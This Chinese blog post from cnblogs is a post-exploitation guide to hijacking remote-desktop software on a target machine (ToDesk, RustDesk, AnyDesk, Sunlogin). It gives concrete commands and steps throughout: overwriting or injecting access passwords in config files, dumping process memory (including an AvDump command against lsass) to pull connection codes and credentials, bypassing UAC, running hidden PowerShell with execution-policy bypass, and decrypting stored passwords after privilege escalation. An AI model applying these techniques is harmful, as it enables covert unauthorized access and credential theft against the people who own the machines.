首页 > 其他分享 >远程desk工具利用总结

远程desk工具利用总结

时间:2023-06-01 21:24:37浏览次数:40  
标签:总结 配置文件 dump -- 密码 内存 desk 远程 Users

NO.1 Todesk

根据目标软件安装情况有以下两种利用方法

1.目标机已有完整版todesk。

1)改配置文件。

老版本可替换至本地查看密码(此法在最近更新的几个版本中已经失效),新版本只可更改密码。

改C:\Program Files (x86)\ToDesk下conf.ini文件tempAuthPassEx字段

tga5h42d

b219c2a861e176d319b0a4e0463896d4af2a02ed7bc88da794541701b46f1af2fc4a9864ae00772cc8d924a801bdaaa3b47fbd2fa637ac4b

65tu07zr

11a48a2981bfda260f2f1a890a97b2ed9fcb9b48a262d20e3a68f6c56d6790cd910e1618a7747df448922b0cfe16c284728d28864923d3c8

kill进程重启即可。

2)内存读密码

userInfo.jsondevlist_xx.json文件有userid(连接码)

dump内存,搜索连接码,上下几行会有密码

4.3.3以下临时密码为6位数字

2.目标机无todest,安装官方精简版

dump内存 仅测试4.3.3.0
运行精简版(需bypassUAC),dump子进程(主进程为system权限)

AvDump.exe是Avast杀毒软件中自带的一个程序,可用于转储指定进程(lsass.exe)内存数据,它带有Avast杀软数字签名。

AvDump.exe --pid 954 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

可通过定位被控端版本 4.3.3.0 、主机名、公网ip、系统版本(更准确),来找到相应位置。

*shell快速提取,不一定有效,密码可能在输出的前后两行

设置utf-8

CHCP 65001

1)连接码

shell findstr "20220829" C:\Users\Public\tod.dmp 时间定位

shell findstr "ip地址" C:\Users\Public\tod.dmp ip定位

2)连接密码

主要靠系统版本号定位,具体看连接码定位字符串显示的版本号

shell findstr "19044" C:\Users\Public\tod.dmp

Wi nd ows 规 格  版 本 号  安 装 日 期  操 作 系 统 内 部 版 本  Windows10 专 业 版  21H2  2022 / 7 / 17

通常为8位数,数字字母混合

6

NO.2 Rustdesk

单机版,无需绕UAC,但部分软件操作会提示UAC。
配置文件地址
C:\Users\username\AppData\Roaming\RustDesk\config\RustDesk.toml

使用powershell可以无窗口执行
powershell-executionPolicy bypass Start-Process -WindowStyle hidden -FilePath 'C:/user/rust.exe'
第一次运行rustdesk会生成配置文件,然后结束进程
taskkill/f /t /im rust.exe
在配置文件中添加密码,6位数密码

在内网还可配置直连功能RustDesk2.toml

[options]
direct-server='Y'
direct-access-port='8443'

NO.3 Anydesk

复制本地C:\Users\guoguang\AppData\Roaming\AnyDesk 下四个文件到远程主机上
删除本地文件,重启开启连接

NO.4 向日葵

自从向日葵12.5版本后,原encry_pwd和fastcode字段已经不在配置文件config.ini和注册表HKEY_USERS.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo内
解决方案一
根据分析,上述字段移动至C:\ProgramData\Oray\SunloginClient\sys_config.ini中
此配置文件默认需要SYSTEM权限才可以读取
提权后拿到id和加密后的密码,经测试算法没变,通过现有项目解密即可 https://github.com/wafinfo/Sunflower_get_Password
解决方案二
通过dump内存的方式匹配明文字符串获取,参考: https://red.rizhan.icu/?thread-176.htm
id正则为k[0-9]{8,}
密码正则为>[a-z0-9]{6},每次刷新后密码的均会保存在内存中

标签:总结,配置文件,dump,--,密码,内存,desk,远程,Users
From: https://www.cnblogs.com/pykiller/p/17450239.html

相关文章

  • 每日总结4.23
    看了很多关于文件上传的帖子,感觉写的都很复杂,于是做了一个总结,写个精简版,希望对大家有所帮助。前端选用<inputtype="file">原生组件,实现该组件美化与图片预览功能。前端代码:<!DOCTYPEhtml><html><head><metacharset="UTF-8"><scriptsrc="js/jquery-3.2.1.min.js"......
  • elasticsearch常用命令总结
    目录#查看集群状态curlhttp://*:9200/_cluster/health?pretty#查看所有索引状态curl"http://*:9200/_cat/indices?pretty"#查看异常索引状态curl"http://*:9200/_cat/indices?v&health=red"#查看异常索引分片分配状态curl"http://*:9200/_cat/shards/your_inde......
  • 23.3.27-4.2 每周总结
    本周的学习任务依然是每天的javaweb学习、mysql、Android开发学习以及后期的课程复习任务。在javaweb学习方面,我学习了Spring框架的使用和AOP编程等内容;在MySQL方面,我学习了事务的隔离级别和存储引擎的对比使用;在Android开发方面,我学习了多线程编程的方法。在后期的课程复习任务方......
  • 软件工程课程总结
    本学期的软件课程中,我学习了地铁站查询系统、分页查询以及团队合作和安卓端的开发,针对以上内容,我写出课程总结。当我们在构建一个完整的地铁站查询系统时,我们需要为用户构建一个友好、高效、易用、多样化的界面。更进一步, 我们可以设计并开发一个android应用程序,为用户提供更加......
  • 软件工程课程总结
    在本学期中,我参加了一门软件工程的课程,该课程包含了软件工程的基本概念和实践技术。在这篇总结中,我会详细描述我在这门课程中学到的内容,以及对本课程的反思和建议。一、学习成果 1.掌握了软件工程的基本概念和流程 在本课程中,我掌握了软件工程的基本概念,例如软件需求分析、......
  • 6.1学习总结
    Dos命令打开terminal的方式command+空格+输入终端/z访达+应用程序+实用工具+终端管理员方式运行:选择以管理员方式运行常用的Dos命令#切换目录cd会改变当前目录到你指定的目录#列出目录下所有文件ls#当前目录显示当前目录绝对路径#返回上一级目录cd..#清理屏......
  • 软件工程课程总结
    软件工程课程总结 软件工程是一门涉及软件开发过程、设计、实现、测试和维护的学科。我在这门课程中学到了很多关于软件工程的知识和实践技术,下面是我的课程总结。首先,在课程中我们了解了软件工程的发展历程、定义和原则。软件工程的发展从单机应用到分布式网络应用,其......
  • 新版idea快捷键总结学习----(用于java开发模式)
    选择代码区ctrlw如果放到以if开头的语句,可以选择if判断条件所在的代码片段游标在单个单词下时选择单词在选中多个单词时,选择整个字符串三次点击时,如果不在字符串单词下,用于选择{}内的代码片段逐级递增如果在单词下方,用于选择单词所在的字符串并且向外逐级扩展。ctrl......
  • 学期总结
    本学期学习了Javaweb和Android开发,这门课程不仅帮助我掌握了编写JavaWeb应用程序和移动应用程序的技能,还让我深刻地了解到了团队协作的重要性。在学习Javaweb方面,我们首先学习了Servlet和JSP的基础知识,包括如何建立一个Web项目、如何配置Tomcat服务器等。此外,我们还学习了使用MV......
  • 数组去重方法总结
    //基于单key或无key去重,单key一般是对象的id,无key就是元素本身是非对象exportfunctionuniqueArr(arr,key){letres;if(key){res=[...newMap(arr.map(t=>[t[key],t])).values()]}else{res=[...newSet(arr)]}returnre......